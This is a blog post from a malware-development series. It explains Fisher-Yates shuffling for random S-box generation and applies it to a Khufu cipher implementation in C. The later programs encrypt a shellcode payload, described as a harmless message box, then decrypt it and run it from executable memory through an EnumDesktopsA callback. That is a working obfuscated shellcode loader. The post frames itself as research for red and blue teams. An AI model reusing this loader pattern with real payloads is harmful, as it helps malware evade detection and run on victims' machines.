Malware and cryptography 36 – random sbox generation algorithms: Fisher-Yates shuffle. Simple C example.
After reading some of my posts about cryptography, for example this or this, my readers had questions regarding the concepts of sbox
generation, so I will decide to continue research cryptography in malware development, and I want to shed light on one of these tricks for generating random sboxes.
This post is the result of my own research on implementing simplest one: Fisher-Yates shuffle trick.
Fisher-YatesPermalink
The Fisher-Yates shuffle was first described by Ronald Fisher and Frank Yates in their 1938 book Statistical tables for biological, agricultural, and medical research. Their algorithm description was written on paper with a pencil, and the randomization was provided by a table of integers. The basic approach described for producing a random permutation of the numbers 1–N is as follows:
- Write down the numbers from 1 to N.
- Choose a random number k between one and the number of unstruck numbers left (inclusive).
- Starting from the low end, strike out the kth number that has not yet been struck out and write it down at the conclusion of a separate list.
- Repeat step 2 until all of the numerals are struck out.
- The numbers typed down in step 3 are now arranged in a random order.
But what does cryptography have to do with it?
The reliability of some block encryption algorithms depends heavily on how “good” the S-boxes
are used in their implementation: the S-box
(substitution box) plays a critical role in block cipher cryptography, primarily in providing non-linearity and strengthening the cipher against attacks.
A few words about non-linearity. S-boxes
ensure that the relationship between plaintext and ciphertext is non-linear, which is crucial for resisting cryptanalytic attacks such as linear cryptanalysis. Non-linear transformations prevent patterns in the plaintext from being preserved in the ciphertext.
Also, a well-designed S-box
contributes to the avalanche effect, where a small change in the plaintext or key leads to significant changes in the ciphertext: this ensures the cipher’s output appears random and makes predicting changes difficult.
In Feistel-based ciphers (e.g., DES), S-boxes
transform the output of the Feistel function, ensuring non-linearity before combining with the plaintext.
If we take specific examples of cryptographic algorithms, in SPN-based block ciphers (e.g., AES
), the S-box
is responsible for replacing input bits with unique output bits, adding confusion to the cryptographic process.
So, as you can see, generating cryptographically secure S-boxes
is a complex process involving mathematical techniques to ensure desirable properties like non-linearity, resistance to differential and linear cryptanalysis, and minimal correlation between input and output bits. While I can’t generate truly secure S-boxes
within this context, let’s implement this shuffle algorithm based on its original specification.
practical examplePermalink
Let’s create simple program that implements the Fisher-Yates shuffle to generate a random permutation of sbox[256]
and prints the results:
/*
* hack.c - random sbox generation algorithms.
* Fisher-Yates shuffle
* Simple C implementation
* @cocomelonc
* https://cocomelonc.github.io/malware/2024/12/16/malware-cryptography-36.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define SBOX_SIZE 256
// Fisher-Yates shuffle
void fisher_yates_shuffle(unsigned char *sbox, int size) {
for (int i = size - 1; i > 0; i--) {
// generate a random index between 0 and i
int j = rand() % (i + 1);
// swap sbox[i] and sbox[j]
unsigned char temp = sbox[i];
sbox[i] = sbox[j];
sbox[j] = temp;
}
}
int main() {
unsigned char sbox[SBOX_SIZE];
// initialize sbox with values 0 to 255
for (int i = 0; i < SBOX_SIZE; i++) {
sbox[i] = (unsigned char)i;
}
// seed the random number generator with the current time
srand((unsigned int)time(NULL));
// shuffle the sbox using Fisher-Yates algorithm
fisher_yates_shuffle(sbox, SBOX_SIZE);
// print the shuffled sbox
printf("generated S-box:\n");
for (int i = 0; i < SBOX_SIZE; i++) {
printf("%02x", sbox[i]);
if ((i + 1) % 16 == 0) {
printf("\n"); // print a newline every 16 values
} else {
printf(" ");
}
}
return 0;
}
First of all, sbox
array is initialized with values from 0
to 255
.
Fisher-Yates shuffle: Iterates backward through the array. Selects a random index j
in the range [0, i]
. Finally, swaps the elements at indices i
and j
.
Randomness: The rand()
function is seeded with the current time using srand(time(NULL))
to ensure different results each time the program is run.
Output: The shuffled S-Box
is printed in a readable format, with 16
values per line.
I also add Windows version, just add WinAPI header:
/*
* hack.c - random sbox generation algorithms.
* Fisher-Yates shuffle
* Simple C implementation
* @cocomelonc
* https://cocomelonc.github.io/malware/2024/12/16/malware-cryptography-36.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <windows.h>
#define SBOX_SIZE 256
// Fisher-Yates shuffle
void fisher_yates_shuffle(unsigned char *sbox, int size) {
for (int i = size - 1; i > 0; i--) {
// generate a random index between 0 and i
int j = rand() % (i + 1);
// swap sbox[i] and sbox[j]
unsigned char temp = sbox[i];
sbox[i] = sbox[j];
sbox[j] = temp;
}
}
int main() {
unsigned char sbox[SBOX_SIZE];
// initialize sbox with values 0 to 255
for (int i = 0; i < SBOX_SIZE; i++) {
sbox[i] = (unsigned char)i;
}
// seed the random number generator with the current time
srand((unsigned int)time(NULL));
// shuffle the sbox using Fisher-Yates algorithm
fisher_yates_shuffle(sbox, SBOX_SIZE);
// print the shuffled sbox
printf("generated S-box:\n");
for (int i = 0; i < SBOX_SIZE; i++) {
printf("%02x", sbox[i]);
if ((i + 1) % 16 == 0) {
printf("\n"); // print a newline every 16 values
} else {
printf(" ");
}
}
return 0;
}
demoPermalink
Compile it for linux:
gcc -o hack hack.c
or for Windows:
x86_64-w64-mingw32-g++ hack2.c -o hack2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
When you run the program, the output will look like this (on my Linux machine, values will vary due to randomness):
As you can see, everything is worked perfectly! =^..^=
Random S-boxes in cryptography algorithmsPermalink
Which ciphers can use randomly generated S-boxes
?
For example, Khufu (1989, NIST) designed with a customizable S-box
for key-dependent substitution and suitable for random S-boxes
: Khufu was specifically designed to use user-generated or random S-boxes
.
Lucifer (1971) designed with static S-boxes
but could be modified to use random S-boxes
.
RC5 and CAST-128: Flexible designs that allow integration of S-boxes
with minor adjustments.
practical example 3Permalink
Let’s integrate Fisher-Yates shuffle to my Khufu payload encryption implementation.
Original code from my post:
/*
* hack.c
* encrypt/decrypt payload
* via Khufu algorithm
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2024/07/21/malware-cryptography-30.html
*/
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
#define ROUNDS 16
#define BLOCK_SIZE 8
#define KEY_SIZE 64
uint8_t key[KEY_SIZE] = {
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F,
0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17,
0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F,
0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27,
0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F,
0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F
};
uint32_t sbox[256];
void khufu_generate_sbox(uint8_t *key, int round) {
for (int i = 0; i < 256; i++) {
sbox[i] = (key[(round * 8 + i) % KEY_SIZE] << 24) |
(key[(round * 8 + i + 1) % KEY_SIZE] << 16) |
(key[(round * 8 + i + 2) % KEY_SIZE] << 8) |
key[(round * 8 + i + 3) % KEY_SIZE];
}
}
void khufu_encrypt(uint8_t *block, uint8_t *key) {
uint32_t left = ((uint32_t)block[0] << 24) | ((uint32_t)block[1] << 16) | ((uint32_t)block[2] << 8) | (uint32_t)block[3];
uint32_t right = ((uint32_t)block[4] << 24) | ((uint32_t)block[5] << 16) | ((uint32_t)block[6] << 8) | (uint32_t)block[7];
left ^= ((uint32_t)key[0] << 24) | ((uint32_t)key[1] << 16) | ((uint32_t)key[2] << 8) | (uint32_t)key[3];
right ^= ((uint32_t)key[4] << 24) | ((uint32_t)key[5] << 16) | ((uint32_t)key[6] << 8) | (uint32_t)key[7];
for (int round = 0; round < ROUNDS; round++) {
khufu_generate_sbox(key, round);
uint32_t temp = left;
left = right ^ sbox[left & 0xFF];
right = (temp >> 8) | (temp << 24);
uint32_t temp2 = left;
left = right;
right = temp2;
}
left ^= ((uint32_t)key[8] << 24) | ((uint32_t)key[9] << 16) | ((uint32_t)key[10] << 8) | (uint32_t)key[11];
right ^= ((uint32_t)key[12] << 24) | ((uint32_t)key[13] << 16) | ((uint32_t)key[14] << 8) | (uint32_t)key[15];
block[0] = (left >> 24) & 0xFF;
block[1] = (left >> 16) & 0xFF;
block[2] = (left >> 8) & 0xFF;
block[3] = left & 0xFF;
block[4] = (right >> 24) & 0xFF;
block[5] = (right >> 16) & 0xFF;
block[6] = (right >> 8) & 0xFF;
block[7] = right & 0xFF;
}
void khufu_decrypt(uint8_t *block, uint8_t *key) {
uint32_t left = ((uint32_t)block[0] << 24) | ((uint32_t)block[1] << 16) | ((uint32_t)block[2] << 8) | (uint32_t)block[3];
uint32_t right = ((uint32_t)block[4] << 24) | ((uint32_t)block[5] << 16) | ((uint32_t)block[6] << 8) | (uint32_t)block[7];
left ^= ((uint32_t)key[8] << 24) | ((uint32_t)key[9] << 16) | ((uint32_t)key[10] << 8) | (uint32_t)key[11];
right ^= ((uint32_t)key[12] << 24) | ((uint32_t)key[13] << 16) | ((uint32_t)key[14] << 8) | (uint32_t)key[15];
for (int round = ROUNDS - 1; round >= 0; round--) {
uint32_t temp = right;
right = left ^ sbox[right & 0xFF];
left = (temp << 8) | (temp >> 24);
uint32_t temp2 = left;
left = right;
right = temp2;
}
left ^= ((uint32_t)key[0] << 24) | ((uint32_t)key[1] << 16) | ((uint32_t)key[2] << 8) | (uint32_t)key[3];
right ^= ((uint32_t)key[4] << 24) | ((uint32_t)key[5] << 16) | ((uint32_t)key[6] << 8) | (uint32_t)key[7];
block[0] = (left >> 24) & 0xFF;
block[1] = (left >> 16) & 0xFF;
block[2] = (left >> 8) & 0xFF;
block[3] = left & 0xFF;
block[4] = (right >> 24) & 0xFF;
block[5] = (right >> 16) & 0xFF;
block[6] = (right >> 8) & 0xFF;
block[7] = right & 0xFF;
}
void khufu_encrypt_shellcode(unsigned char* shellcode, int shellcode_len) {
int i;
for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
khufu_encrypt(shellcode + i * BLOCK_SIZE, key);
}
// check if there are remaining bytes
int remaining = shellcode_len % BLOCK_SIZE;
if (remaining != 0) {
unsigned char pad[BLOCK_SIZE] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
memcpy(pad, shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, remaining);
khufu_encrypt(pad, key);
memcpy(shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, pad, remaining);
}
}
void khufu_decrypt_shellcode(unsigned char* shellcode, int shellcode_len) {
int i;
for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
khufu_decrypt(shellcode + i * BLOCK_SIZE, key);
}
// check if there are remaining bytes
int remaining = shellcode_len % BLOCK_SIZE;
if (remaining != 0) {
unsigned char pad[BLOCK_SIZE] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
memcpy(pad, shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, remaining);
khufu_decrypt(pad, key);
memcpy(shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, pad, remaining);
}
}
int main() {
unsigned char my_payload[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";
int my_payload_len = sizeof(my_payload);
int pad_len = my_payload_len + (8 - my_payload_len % 8) % 8;
unsigned char padded[pad_len];
memset(padded, 0x90, pad_len);
memcpy(padded, my_payload, my_payload_len);
printf("original shellcode: ");
for (int i = 0; i < my_payload_len; i++) {
printf("%02x ", my_payload[i]);
}
printf("\n\n");
khufu_encrypt_shellcode(padded, pad_len);
printf("encrypted shellcode: ");
for (int i = 0; i < pad_len; i++) {
printf("%02x ", padded[i]);
}
printf("\n\n");
khufu_decrypt_shellcode(padded, pad_len);
printf("decrypted shellcode: ");
for (int i = 0; i < my_payload_len; i++) {
printf("%02x ", padded[i]);
}
printf("\n\n");
LPVOID mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, padded, my_payload_len);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);
return 0;
}
We can add our random algorithm for key generation. Instead of using a predefined static key, the we can use a random key generated via Fisher-Yates Shuffle:
// Fisher-Yates shuffle
void fisher_yates_shuffle(unsigned char *sbox, int size) {
for (int i = size - 1; i > 0; i--) {
// generate a random index between 0 and i
int j = rand() % (i + 1);
// swap sbox[i] and sbox[j]
unsigned char temp = sbox[i];
sbox[i] = sbox[j];
sbox[j] = temp;
}
}
void khufu_generate_key() {
// initialize key with values 0 to 64
for (int i = 0; i < KEY_SIZE; i++) {
key[i] = (unsigned char)i;
}
// seed the random number generator with the current time
srand((unsigned int)time(NULL));
// shuffle the key using Fisher-Yates algorithm
fisher_yates_shuffle(key, KEY_SIZE);
}
As you can see, the key starts as an array of values 0x00
to 0x3F
(0-63
in hexadecimal) and gets shuffled randomly. This ensures that the key is unique for each execution of the program.
So updated full source code looks like this (hack3.c
):
/*
* hack.c
* encrypt/decrypt payload
* via Khufu algorithm
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2024/07/21/malware-cryptography-30.html
*/
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>
// #include <windows.h>
#define ROUNDS 16
#define BLOCK_SIZE 8
#define KEY_SIZE 64
uint8_t key[KEY_SIZE] = {
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F,
0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17,
0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F,
0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27,
0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F,
0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F
};
uint32_t sbox[256];
// Fisher-Yates shuffle
void fisher_yates_shuffle(unsigned char *sbox, int size) {
for (int i = size - 1; i > 0; i--) {
// generate a random index between 0 and i
int j = rand() % (i + 1);
// swap sbox[i] and sbox[j]
unsigned char temp = sbox[i];
sbox[i] = sbox[j];
sbox[j] = temp;
}
}
void khufu_generate_key() {
// initialize key with values 0 to 64
for (int i = 0; i < KEY_SIZE; i++) {
key[i] = (unsigned char)i;
}
// seed the random number generator with the current time
srand((unsigned int)time(NULL));
// shuffle the key using Fisher-Yates algorithm
fisher_yates_shuffle(key, KEY_SIZE);
}
void khufu_generate_sbox(uint8_t *key, int round) {
for (int i = 0; i < 256; i++) {
sbox[i] = (key[(round * 8 + i) % KEY_SIZE] << 24) |
(key[(round * 8 + i + 1) % KEY_SIZE] << 16) |
(key[(round * 8 + i + 2) % KEY_SIZE] << 8) |
key[(round * 8 + i + 3) % KEY_SIZE];
}
}
void khufu_encrypt(uint8_t *block, uint8_t *key) {
uint32_t left = ((uint32_t)block[0] << 24) | ((uint32_t)block[1] << 16) | ((uint32_t)block[2] << 8) | (uint32_t)block[3];
uint32_t right = ((uint32_t)block[4] << 24) | ((uint32_t)block[5] << 16) | ((uint32_t)block[6] << 8) | (uint32_t)block[7];
left ^= ((uint32_t)key[0] << 24) | ((uint32_t)key[1] << 16) | ((uint32_t)key[2] << 8) | (uint32_t)key[3];
right ^= ((uint32_t)key[4] << 24) | ((uint32_t)key[5] << 16) | ((uint32_t)key[6] << 8) | (uint32_t)key[7];
for (int round = 0; round < ROUNDS; round++) {
khufu_generate_sbox(key, round);
uint32_t temp = left;
left = right ^ sbox[left & 0xFF];
right = (temp >> 8) | (temp << 24);
uint32_t temp2 = left;
left = right;
right = temp2;
}
left ^= ((uint32_t)key[8] << 24) | ((uint32_t)key[9] << 16) | ((uint32_t)key[10] << 8) | (uint32_t)key[11];
right ^= ((uint32_t)key[12] << 24) | ((uint32_t)key[13] << 16) | ((uint32_t)key[14] << 8) | (uint32_t)key[15];
block[0] = (left >> 24) & 0xFF;
block[1] = (left >> 16) & 0xFF;
block[2] = (left >> 8) & 0xFF;
block[3] = left & 0xFF;
block[4] = (right >> 24) & 0xFF;
block[5] = (right >> 16) & 0xFF;
block[6] = (right >> 8) & 0xFF;
block[7] = right & 0xFF;
}
void khufu_decrypt(uint8_t *block, uint8_t *key) {
uint32_t left = ((uint32_t)block[0] << 24) | ((uint32_t)block[1] << 16) | ((uint32_t)block[2] << 8) | (uint32_t)block[3];
uint32_t right = ((uint32_t)block[4] << 24) | ((uint32_t)block[5] << 16) | ((uint32_t)block[6] << 8) | (uint32_t)block[7];
left ^= ((uint32_t)key[8] << 24) | ((uint32_t)key[9] << 16) | ((uint32_t)key[10] << 8) | (uint32_t)key[11];
right ^= ((uint32_t)key[12] << 24) | ((uint32_t)key[13] << 16) | ((uint32_t)key[14] << 8) | (uint32_t)key[15];
for (int round = ROUNDS - 1; round >= 0; round--) {
uint32_t temp = right;
right = left ^ sbox[right & 0xFF];
left = (temp << 8) | (temp >> 24);
uint32_t temp2 = left;
left = right;
right = temp2;
}
left ^= ((uint32_t)key[0] << 24) | ((uint32_t)key[1] << 16) | ((uint32_t)key[2] << 8) | (uint32_t)key[3];
right ^= ((uint32_t)key[4] << 24) | ((uint32_t)key[5] << 16) | ((uint32_t)key[6] << 8) | (uint32_t)key[7];
block[0] = (left >> 24) & 0xFF;
block[1] = (left >> 16) & 0xFF;
block[2] = (left >> 8) & 0xFF;
block[3] = left & 0xFF;
block[4] = (right >> 24) & 0xFF;
block[5] = (right >> 16) & 0xFF;
block[6] = (right >> 8) & 0xFF;
block[7] = right & 0xFF;
}
void khufu_encrypt_shellcode(unsigned char* shellcode, int shellcode_len) {
int i;
for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
khufu_encrypt(shellcode + i * BLOCK_SIZE, key);
}
// check if there are remaining bytes
int remaining = shellcode_len % BLOCK_SIZE;
if (remaining != 0) {
unsigned char pad[BLOCK_SIZE] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
memcpy(pad, shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, remaining);
khufu_encrypt(pad, key);
memcpy(shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, pad, remaining);
}
}
void khufu_decrypt_shellcode(unsigned char* shellcode, int shellcode_len) {
int i;
for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
khufu_decrypt(shellcode + i * BLOCK_SIZE, key);
}
// check if there are remaining bytes
int remaining = shellcode_len % BLOCK_SIZE;
if (remaining != 0) {
unsigned char pad[BLOCK_SIZE] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
memcpy(pad, shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, remaining);
khufu_decrypt(pad, key);
memcpy(shellcode + (shellcode_len / BLOCK_SIZE) * BLOCK_SIZE, pad, remaining);
}
}
int main() {
khufu_generate_key();
printf("generated key:\n");
for (int i = 0; i < KEY_SIZE; i++) {
printf("%02x", key[i]);
if ((i + 1) % 8 == 0) {
printf("\n"); // print a newline every 16 values
} else {
printf(" ");
}
}
unsigned char my_payload[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";
int my_payload_len = sizeof(my_payload);
int pad_len = my_payload_len + (8 - my_payload_len % 8) % 8;
unsigned char padded[pad_len];
memset(padded, 0x90, pad_len);
memcpy(padded, my_payload, my_payload_len);
printf("original shellcode: ");
for (int i = 0; i < my_payload_len; i++) {
printf("%02x ", my_payload[i]);
}
printf("\n\n");
khufu_encrypt_shellcode(padded, pad_len);
printf("encrypted shellcode: ");
for (int i = 0; i < pad_len; i++) {
printf("%02x ", padded[i]);
}
printf("\n\n");
khufu_decrypt_shellcode(padded, pad_len);
printf("decrypted shellcode: ");
for (int i = 0; i < my_payload_len; i++) {
printf("%02x ", padded[i]);
}
printf("\n\n");
// LPVOID mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// RtlMoveMemory(mem, padded, my_payload_len);
// EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);
return 0;
}
As usually I used meow-meow
messagebox payload in this code.
demo 2Permalink
Compile it (comment WinAPI functions and headers):
gcc -o hack3 hack3.c
For demo purposes, run it on my linux machine:
./hack3
Encryption key changes every time the program is run:
demo 3Permalink
Uncomment WinAPI functions, compile for run payload:
x86_64-w64-mingw32-g++ hack4.c -o hack4.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
As you can see, everything is worked perfectly! =^..^=
To another trick for integration Fisher-Yates shuffle into my Khufu implementation for generating a random S-box
, we can replace the deterministic khufu_generate_sbox
function with a new implementation that uses a shuffled S-box
. Here’s how we can modify our code step by step:
- Implement the Fisher-Yates algorithm to shuffle the sbox array.
- Replace the deterministic
S-Box
generation logic with the Fisher-Yates shuffle to generate a random permutation of theS-Box
for each round. - Use
srand(time(NULL))
or any cryptographically secure RNG to ensure randomness for research purposes.
final wordsPermalink
The S-box
is the heart of many block ciphers, providing the critical confusion component required to secure encryption. A poorly designed or predictable S-box
can render a cipher vulnerable to attacks, while a strong S-box
ensures robustness and resistance against advanced cryptanalysis.
I hope this post is useful for malware researchers, C/C++ programmers, spreads awareness to the blue teamers of this interesting shuffle technique, and adds a weapon to the red teamers arsenal.